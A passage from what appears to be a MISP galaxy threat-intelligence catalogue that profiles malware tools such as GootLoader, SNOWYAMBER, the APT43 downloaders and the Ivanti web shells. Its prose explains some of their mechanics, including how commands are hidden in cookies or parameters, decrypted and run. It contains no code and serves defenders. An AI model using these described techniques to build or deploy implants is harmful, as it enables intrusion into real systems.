https://www.mandiant.com/resources/blog/melting-unc2198-icedid-to-ransomware-operations

GootLoader

GootLoader is a malware loader historically associated with the GootKit malware. As its developers updated its capabilities, GootLoader has evolved from a loader downloading a malicious payload into a multi-payload malware platform. As a loader malware, GootLoader is usually the first-stage of a system compromise. By leveraging search engine poisoning, GootLoader’s developers may compromise or create websites that rank highly in search engine results, such as Google search results. How is it delivered? Via Malicious files available for download on compromised websites that rank high as search engine results

The tag is: misp-galaxy:tool="GootLoader"

GootLoader has relationships with:

  • similar: misp-galaxy:malpedia="GootLoader" with estimative-language:likelihood-probability="almost-certain"

Table 16760. Table References

Links

https://www.cyber.nj.gov/alerts-advisories/gootloader-malware-platform-uses-sophisticated-techniques-to-deliver-malware

https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader

BumbleBee

BumbleBee is a modular backdoor that comprises two applications, a server and a client application (a master and slaver application, respectively in the malware’s jargon). Once the client application is deployed on the target computer (these are commonly local government devices), threat actors can control the machine using the server module. Let us take a deeper look into this backdoor.

The tag is: misp-galaxy:tool="BumbleBee"

BumbleBee has relationships with:

  • related-to: misp-galaxy:exploit-kit="Hunter" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BumbleBee" with estimative-language:likelihood-probability="almost-certain"

Table 16761. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/buzzing-in-the-background-bumblebee-a-new-modular-backdoor-evolv.html

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. Benign in itself, but used by threat actors.

The tag is: misp-galaxy:tool="Chisel"

Table 16762. Table References

Links

https://github.com/jpillora/chisel

SharPyShell

SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications

The tag is: misp-galaxy:tool="SharPyShell"

Table 16763. Table References

Links

https://github.com/antonioCoco/SharPyShell

Raspberry Robin

Raspberry Robin has evolved from being a widely distributed worm with no observed post-infection actions when Red Canary first reported it in May 2022, to one of the largest malware distribution platforms currently active.

The tag is: misp-galaxy:tool="Raspberry Robin"

Raspberry Robin has relationships with:

  • similar: misp-galaxy:malpedia="Raspberry Robin" with estimative-language:likelihood-probability="almost-certain"

Table 16764. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Fauppod

The Fauppod malware delivers a JavaScript backdoor to gain unauthorized access to the target system and deploy additional malware.

The tag is: misp-galaxy:tool="Fauppod"

Table 16765. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Truebot

This threat takes multiple screenshots of your desktop. It saves all screenshots in a .dat file that becomes a collection of bitmap images. According to Group-IB, FlawedAmmyy.downloader and Truebot would have been developed by the same individual

The tag is: misp-galaxy:tool="Truebot"

Truebot is also known as:

  • Silence

Truebot has relationships with:

  • similar: misp-galaxy:tool="Truebot" with estimative-language:likelihood-probability="likely"

Table 16766. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

FakeUpdates

FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT. FAKEUPDATES has been heavily used by UNC1543,a financially motivated group.

SocGholish, first appearing in late 2017 and rising to prominence in mid-2018, has been used to describe both the web drive-by download network used to infect victims and the JavaScript-based loader malware that targets Windows systems.

The tag is: misp-galaxy:tool="FakeUpdates"

FakeUpdates is also known as:

  • FakeUpdate

  • SocGholish

FakeUpdates has relationships with:

  • used-by: misp-galaxy:threat-actor="GOLD PRELUDE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="FAKEUPDATES" with estimative-language:likelihood-probability="almost-certain"

Table 16767. Table References

Links

https://www.malwarebytes.com/blog/news/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://www.secureworks.com/research/threat-profiles/gold-prelude

https://redcanary.com/threat-detection-report/threats/socgholish/

TgToxic

Banking trojan named TgToxic (detected by Trend Micro as AndroidOS_TgToxic based on its special encrypted filename) embedded in multiple fake apps.

The tag is: misp-galaxy:tool="TgToxic"

Table 16768. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/tgtoxic-malware-targets-southeast-asia-android-users.html

WasabiSeed

According to Proofpoint, WasabiSeed is a simple VBS downloader which repeatedly uses Windows Installer to connect to the C2 server looking for MSI packages to download and run. Proofpoint showed that it downloads and executes first a second MSI file containing Screenshotter.

The tag is: misp-galaxy:tool="WasabiSeed"

WasabiSeed has relationships with:

  • similar: misp-galaxy:tool="SunSeed" with estimative-language:likelihood-probability="likely"

Table 16769. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Screenshotter

According to Proofpoint, this is a utility with a single function of taking a JPG screenshot of the user’s desktop and submitting it to a remote C2 via a POST to a hardcoded IP address. This is helpful to the threat actor during the reconnaissance and victim profiling stage.

The tag is: misp-galaxy:tool="Screenshotter"

Table 16770. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

SunSeed

According to Proofpoint, this is a Lua-based malware likely used by a nation-state sponsored attacker used to target European government personnel involved in managing the logistics of refugees fleeing Ukraine.

The tag is: misp-galaxy:tool="SunSeed"

SunSeed has relationships with:

  • similar: misp-galaxy:malpedia="SunSeed" with estimative-language:likelihood-probability="almost-certain"

Table 16771. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails

https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware

AHK Bot

According to Proofpoint, the A(uto)H(ot)K(key) Bot is a collection of separate AutoHotKey scripts. The bot’s main component is an infinite loop that polls and downloads additional AHK scripts. The bot can load a stealer like Rhadamanthys and can check if the machine is part of an Active Directory domain.

The tag is: misp-galaxy:tool="AHK Bot"

Table 16772. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

https://research.checkpoint.com/2019/finteam-trojanized-teamviewer-against-government-targets/

https://www.trendmicro.com/en_us/research/19/d/potential-targeted-attack-uses-autohotkey-and-malicious-script-embedded-in-excel-file-to-avoid-detection.html

https://www.trendmicro.com/en_us/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html

SNOWYAMBER

A tool first used in October 2022, abusing the Notion service to communicate and download further malicious files. Two versions of this tool have been observed.

SNOWYAMBER is a dropper that was used in an espionage campaign significantly overlapping with publicly described activity linked to the APT29 and NOBELIUM activity sets. SNOWYAMBER abuses the NOTION collaboration service as a communication channel. It does not contain any other capabilities aside from downloading and executing 2nd stage. To bypass security products, SNOWYAMBER uses several antidetection and obfuscation techniques, including string encryption, dynamic API resolving, EDR/AV unhooking, and direct syscalls.

The tag is: misp-galaxy:tool="SNOWYAMBER"

SNOWYAMBER has relationships with:

  • used-by: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:online-service="Notion" with estimative-language:likelihood-probability="likely"

Table 16773. Table References

Links

https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

https://www.gov.pl/attachment/6e085a2c-ac05-4b62-9423-5d6e9ef730bf

https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d

HALFRIG

Used for the first time in February 2023. This tool is distinguished from the others by the embedded code that runs the COBALT STRIKE tool.

HALFRIG is a stager for CobaltStrike Beacon that was used in an espionage campaign significantly overlapping with publicly described activity linked to the APT29 and NOBELIUM activity sets. HALFRIG has significant code overlap with the QUARTERRIG and it is highly probable that it was developed by the same team.

The tag is: misp-galaxy:tool="HALFRIG"

HALFRIG has relationships with:

  • used-by: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

Table 16774. Table References

Links

https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

https://www.gov.pl/attachment/64193e8d-05e2-4cbf-bb4c-5f58da21fefb

https://www.gov.pl/attachment/6e085a2c-ac05-4b62-9423-5d6e9ef730bf

QUARTERRIG

A tool first used in March 2023, sharing part of the code with HALFRIG. Two versions of this tool were observed.

QUARTERRIG is a dropper that was used in an espionage campaign significantly overlapping with publicly described activity linked to the APT29 and NOBELIUM activity sets. QUARTERRIG does not contain any other capabilities aside from downloading and executing 2nd stage. To bypass security products, QUARTERRIG heavily relies on obfuscation based on opaque predicates and multi-stage execution, interweaving shellcode and PE files. HALFRIG and QUARTERRIG share some of the codebase, suggesting that QUARTERRIG authors have access to both HALFRIG source code and the same obfuscation libraries.

The tag is: misp-galaxy:tool="QUARTERRIG"

QUARTERRIG has relationships with:

  • used-by: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

Table 16775. Table References

Links

https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77

https://www.gov.pl/attachment/6e085a2c-ac05-4b62-9423-5d6e9ef730bf

ICONICSTEALER

ICONICSTEALER is a C/C++ data miner that collects application configuration data as well as browser history.

The tag is: misp-galaxy:tool="ICONICSTEALER"

Table 16776. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

DAVESHELL

DAVESHELL is shellcode that functions as an in-memory dropper. Its embedded payload is mapped into memory and executed.

The tag is: misp-galaxy:tool="DAVESHELL"

Table 16777. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

SIGFLIP

SigFlip is a tool for patching authenticode signed PE-COFF files to inject arbitrary code without affecting or breaking the file’s signature.

The tag is: misp-galaxy:tool="SIGFLIP"

Table 16778. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

COLDCAT

COLDCAT is a complex downloader. COLDCAT generates unique host identifier information, and beacons it to a C2 that is specified in a separate file via POST request with the data in the cookie header. After a brief handshake, the malware expects base64 encoded shellcode to execute in response.

The tag is: misp-galaxy:tool="COLDCAT"

Table 16779. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

TAXHAUL

TAXHAUL is a DLL that, when executed, decrypts a shellcode payload expected at C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TXR.0.regtrans-ms. Mandiant has seen TAXHAUL persist via DLL side loading.

The tag is: misp-galaxy:tool="TAXHAUL"

Table 16780. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

SUDDENICON

downloader (?)

The tag is: misp-galaxy:tool="SUDDENICON"

Table 16781. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

AMADEY

AMADEY is a downloader written in C that retrieves payloads via HTTP. Downloaded payloads are written to disk and executed. Availability: Public

The tag is: misp-galaxy:tool="AMADEY"

AMADEY has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16782. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

BENCHMARK

BENCHMARK is a dropper written in C/C++ that reads a filename and extracts a Base64 encoded payload from a hard-coded path, decodes the payload and drops it to disk. Availability: Non-public

The tag is: misp-galaxy:tool="BENCHMARK"

BENCHMARK has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16783. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

BITTERSWEET

BITTERSWEET is a C/C++ Windows downloader. It collects basic system information before downloading the next stage to disk and executing. Availability: Non-public

The tag is: misp-galaxy:tool="BITTERSWEET"

BITTERSWEET has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16784. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

BRAVEPRINCE

BRAVEPRINCE is a C/C++ downloader. It uses the Daum email service to upload collected system information and download files. Availability: Public

The tag is: misp-galaxy:tool="BRAVEPRINCE"

BRAVEPRINCE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16785. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

COINTOSS

COINTOSS is a C/C++ downloader. It uses the Windows Management Instrumentation command-line (WMIC) utility to download the payload over FTP. COINTOSS then creates and runs a batch script to uninstall itself. Availability: Non-public

The tag is: misp-galaxy:tool="COINTOSS"

COINTOSS is also known as:

  • COINTOSS.XLM

COINTOSS has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16786. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

DINOLAB

DINOLAB is a C/C++ builder. It is used to encrypt and decrypt files, obfuscate VBSscripts, and infect files. Availability: Non-public

The tag is: misp-galaxy:tool="DINOLAB"

DINOLAB has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16787. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

DRIVEDOWN

DRIVEDOWN is a C/C++ Windows downloader capable of executing embedded scripts and downloading stages from OneDrive. Availability: Non-public

The tag is: misp-galaxy:tool="DRIVEDOWN"

DRIVEDOWN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16788. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GOLDDRAGON

GOLDDRAGON is a downloader written in C that retrieves a payload from a remote server via HTTP. The downloaded payload is written to disk and executed. GOLDDRAGON also extracts a payload from a Hangul Word Processor document and writes it to a startup directory. As a result, the new file is executed when the current user logs in. Availability: Non-public

The tag is: misp-galaxy:tool="GOLDDRAGON"

GOLDDRAGON is also known as:

  • GOLDDRAGON.POWERSHELL

GOLDDRAGON has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="GoldDragon" with estimative-language:likelihood-probability="likely"

Table 16789. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

EGGHATCH

EGGHATCH is a C/C++ Windows downloader. It uses mshta.exe to download and execute a script. Availability: Non-public

The tag is: misp-galaxy:tool="EGGHATCH"

EGGHATCH has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16790. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GOLDDROP

GOLDDROP is a C/C++ Windows dropper. It decrypts a resource file, saves it to the file system, and injects it into another process. Availability: Non-public

The tag is: misp-galaxy:tool="GOLDDROP"

GOLDDROP has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16791. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GOLDSMELT

GOLDSMELT is a C/C++ utility used to close the rundll32.exe process and delete a file likely used for logs. Availability: Non-public

The tag is: misp-galaxy:tool="GOLDSMELT"

GOLDSMELT has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16792. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

Invoke-Mimikatz

Invoke-Mimikatz is PowerShell script that reflectively loads a Mimikatz credential-stealing DLL into memory. Availability: Public

The tag is: misp-galaxy:tool="Invoke-Mimikatz"

Invoke-Mimikatz has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="Mimikatz" with estimative-language:likelihood-probability="likely"

Table 16793. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

JURASSICSHELL

JURASSICSHELL is a PHP file management web shell that allows the actor to download and upload files. Availability: Non-public

The tag is: misp-galaxy:tool="JURASSICSHELL"

JURASSICSHELL has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16794. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LANDMARK

LANDMARK is a C/C++ Windows launcher that loads and executes a file on disk stored as desktop.r5u. Availability: Non-public

The tag is: misp-galaxy:tool="LANDMARK"

LANDMARK is also known as:

  • LANDMARK.NET

LANDMARK has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16795. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LATEOP

LATEOP is a datamine VisualBasic script that can enumerate a variety of characteristics of a target system as well as execute additional arbitrary VisualBasic content. Some deployments of LATEOP have led to the download and execution of the PASSMARK credential theft payload. In contrast, somedeployments of LATEOP.v2 have originated from BENCHMARK sourced infections. Availability: Non-public

The tag is: misp-galaxy:tool="LATEOP"

LATEOP is also known as:

  • LATEOP.V2

LATEOP has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16796. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

LONEJOGGER

LONEJOGGER is a downloader/dropper which has been observed targeting cryptocurrency services (including exchanges and investment companies), and uses a .lnk shortcut to download guardrailed HTML Application payloads. Availability: Non-public

The tag is: misp-galaxy:tool="LONEJOGGER"

LONEJOGGER has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16797. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PASSMARK

PASSMARK is a credential harvester that steals usernames and passwords from web browsers and email applications. PASSMARK is likely derived from the tool PassView. Availability: Public

The tag is: misp-galaxy:tool="PASSMARK"

PASSMARK has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16798. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PENCILDOWN

PENCILDOWN is a C/C++ Windows based downloader. PENCILDOWN collects basic system information and sends it to the C2 server before receiving the next stage. The next stage is then loaded in memory or executed directly based off a flag in the response. Availability: Non-public

The tag is: misp-galaxy:tool="PENCILDOWN"

PENCILDOWN is also known as:

  • PENCILDOWN.ANDROID

PENCILDOWN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16799. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PENDOWN

PENDOWN is a downloader written in C++ that retrieves a payload via HTTP. The downloaded file is saved to disk and executed. Availability: Non-public

The tag is: misp-galaxy:tool="PENDOWN"

PENDOWN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16800. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

PUMPKINBAR

PUMPKINBAR is a C/C++ dropper. PUMPKINBAR can contain multiple payloads encoded and embedded within itself. The key to decode each payload is appended at the end of the PUMPKINBAR executable. The payloads are dropped to disk and executed. Availability: Non-public

The tag is: misp-galaxy:tool="PUMPKINBAR"

PUMPKINBAR has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16801. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SLIMCURL

SLIMCURL is a C/C++ downloader. It contains the next stage as a Base64 encoded Google Drive link. The next stage is downloaded using cURL. Availability: Non-public

The tag is: misp-galaxy:tool="SLIMCURL"

SLIMCURL has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16802. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SPICYTUNA

SPICYTUNA is a VBA downloader. It collects basic system information and is capable of downloading and executing additional stages. Availability: Non-public

The tag is: misp-galaxy:tool="SPICYTUNA"

SPICYTUNA has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16803. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

SWEETDROP

SWEETDROP is a C/C++ Windows dropper. It drops an embedded binary resource to the file system and executes it. Availability: Non-public

The tag is: misp-galaxy:tool="SWEETDROP"

SWEETDROP has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16804. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

VENOMBITE

VENOMBITE is a C/C++ Windows downloader that has evolved from PENDOWN. It uses the same custom encoding routine, but the network functionality has been moved to an embedded executable. The downloaded file is loaded and executed in memory. Availability: Non-public

The tag is: misp-galaxy:tool="VENOMBITE"

VENOMBITE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16805. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

DarkGate

First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.

The tag is: misp-galaxy:tool="DarkGate"

DarkGate is also known as:

  • Meh

Table 16806. Table References

Links

https://0xtoxin.github.io/threat%20breakdown/DarkGate-Camapign-Analysis/

https://www.aon.com/cyber-solutions/aon_cyber_labs/darkgate-keylogger-analysis-masterofnone/

https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/

https://www.zerofox.com/blog/the-underground-economist-volume-3-issue-12/

https://decoded.avast.io/janrubin/meh-2-2/

https://decoded.avast.io/janrubin/complex-obfuscation-meh/

https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign

DangerAds

This is a loader Trojan used by AtlasCross in this activity. Its main function is to detect the host environment and execute a built-in shellcode in its own process, and then the shellcode loads and runs subsequent Trojan programs. DangerAds writes major malicious code to the .NET dll program’s HelpText method, so it starts when an external program invokes Help from that dll program. It should be noted that the user name and local domain name of the host will be collected before the main malicious functions of DangerAds are executed, and subsequent codes will be executed only when one of these two names contains the keyword “danger” or “ads-wcf”. Therefore, it can be judged that this attack is a targeted attack against the domain or user name containing “ads-wcf”. The main body of DangerAds malicious code will determine the number of program version bits and selectively decrypt and execute an x86 or x64 shellcode. DangerAds uses multi-byte XOR for decryption, while shellcode is loaded directly in the process. In the shellcode stage, DangerAds uses a set of open-source scheme sRDI (https://github.com/monoxgas/sRDI/blob/master/shellcodeRDI/shellcodeRDI.c)) to load and execute DLL programs. The shellcode finally loads the attached DLL program at its tail and calls the export function EnumWinEvent. The DLL program loaded by this shellcode is the AtlasAgent Trojan developed by AtlasCross.

The tag is: misp-galaxy:tool="DangerAds"

DangerAds has relationships with:

  • used-by: misp-galaxy:threat-actor="AtlasCross" with estimative-language:likelihood-probability="likely"

  • executes: misp-galaxy:tool="AtlasAgent" with estimative-language:likelihood-probability="likely"

Table 16807. Table References

Links

https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

AtlasAgent

AtlasAgent used in this attack activity is Trojan horse program developed by AtlasCross. The main functions of the Trojan are to obtain host information, process information, prevent opening of multi-programs, inject specified shellcode and download files from CnC servers. The Trojan communicates with the CnC through HTTP protocol, encrypts communication data using Base64 encoding after RC4 encryption, and encrypts key APIs using two encryption methods at the same time.

The tag is: misp-galaxy:tool="AtlasAgent"

AtlasAgent has relationships with:

  • used-by: misp-galaxy:threat-actor="AtlasCross" with estimative-language:likelihood-probability="likely"

  • executed-by: misp-galaxy:tool="DangerAds" with estimative-language:likelihood-probability="likely"

Table 16808. Table References

Links

https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

RDP Wrapper

The tag is: misp-galaxy:tool="RDP Wrapper"

RDP Wrapper has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 16809. Table References

Links

https://asec.ahnlab.com/en/57873/

TightVNC

open-source VNC tool

The tag is: misp-galaxy:tool="TightVNC"

TightVNC has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 16810. Table References

Links

https://asec.ahnlab.com/en/57873/

RevClient

Malware

The tag is: misp-galaxy:tool="RevClient"

RevClient has relationships with:

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 16811. Table References

Links

https://asec.ahnlab.com/en/57873/

Colibri Loader

Colibri Loader is a piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material“. As it names suggests, it is meant to deliver and manage payloads onto infected computers.

The tag is: misp-galaxy:tool="Colibri Loader"

Colibri Loader has relationships with:

  • delivers: misp-galaxy:stealer="Mars Stealer" with estimative-language:likelihood-probability="very-likely"

Table 16812. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique

BUSHWALK

A mitigation bypass technique was recently identified that led to the deployment of a custom webshell tracked as BUSHWALK. Successful exploitation would bypass the initial mitigation provided by Ivanti on Jan. 10, 2024. At this time, Mandiant assesses the mitigation bypass activity is highly targeted, limited, and is distinct from the post-advisory mass exploitation activity. BUSHWALK is written in Perl and is embedded into a legitimate CS file, querymanifest.cgi. BUSHWALK provides a threat actor the ability to execute arbitrary commands or write files to a server. BUSHWALK executes its malicious Perl function, validateVersion, if the web request platform parameter is SafariiOS. It uses Base64 and RC4 to decode and decrypt the threat actor’s payload in the web request’s command parameter.

The tag is: misp-galaxy:tool="BUSHWALK"

Table 16813. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

LIGHTWIRE

The original LIGHTWIRE webshell sample contains a simpler obfuscation routine. It will initialize an RC4 object and then immediately use the RC4 object to decrypt the issued command./nMandiant has identified an additional variant of the LIGHTWIRE web shell that inserts itself into a legitimate component of the VPN gateway, compcheckresult.cgi./nThe new sample utilizes the same GET parameters as the original LIGHTWIRE sample./nThe new variant of LIGHTWIRE features a different obfuscation routine. It first assigns a string scalar variable to $useCompOnly. Next, it will use the Perl tr operator to transform the string using a character-by-character translation. The key is then Base64-decoded and used to RC4 decrypt the incoming request. Finally, the issued command is executed by calling eval.

The tag is: misp-galaxy:tool="LIGHTWIRE"

Table 16814. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

CHAINLINE

CHAINLINE is a Python webshell backdoor that is embedded in a Ivanti Connect Secure Python package that enables arbitrary command execution./nCHAINLINE was identified in the CAV Python package in the following path: /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/health.py. This is the same Python package modified to support the WIREFIRE web shell./nUnlike WIREFIRE, which modifies an existing file, CHAINLINE creates a new file called health.py, which is not a legitimate filename in the CAV Python package. The existence of this filename or an associated compiled Python cache file may indicate the presence of CHAINLINE./nUNC5221 registered a new API resource path to support the access of CHAINLINE at the REST endpoint /api/v1/cav/client/health. This was accomplished by importing the maliciously created Health API resource and then calling the add_resource() class method on the FLASK-RESTful Api object within /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/init.py.

The tag is: misp-galaxy:tool="CHAINLINE"

Table 16815. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

FRAMESTING

FRAMESTING is a Python webshell embedded in a Ivanti Connect Secure Python package that enables arbitrary command execution./nFRAMESTING was identified in the CAV Python package in the following path: /home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/category.py. Note that this is the same Python package modified to support the WIREFIRE and CHAINLINE web shells./nWhen installed, the threat actor can access FRAMESTING web shell at the REST endpoint /api/v1/cav/client/categories with a POST request. Note that the legitimate categories endpoint only accepts GET requests./nThe web shell employs two methods of accepting commands from an attacker. It first attempts to retrieve the command stored in the value of a cookie named DSID from the current HTTP request. If the cookie is not present or is not of the expected length, it will attempt to decompress zlib data within the request’s POST data. Lastly, FRAMESTING will then pass the decrypted POST data into a Python exec() statement to dynamically execute additional Python code./nNote that DSID is also the name of a cookie used by Ivanti Connect Secure appliances for maintaining user VPN sessions. FRAMESTING likely uses the same cookie name to blend in with network traffic.

The tag is: misp-galaxy:tool="FRAMESTING"

Table 16816. Table References

Links

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

IMPACKET

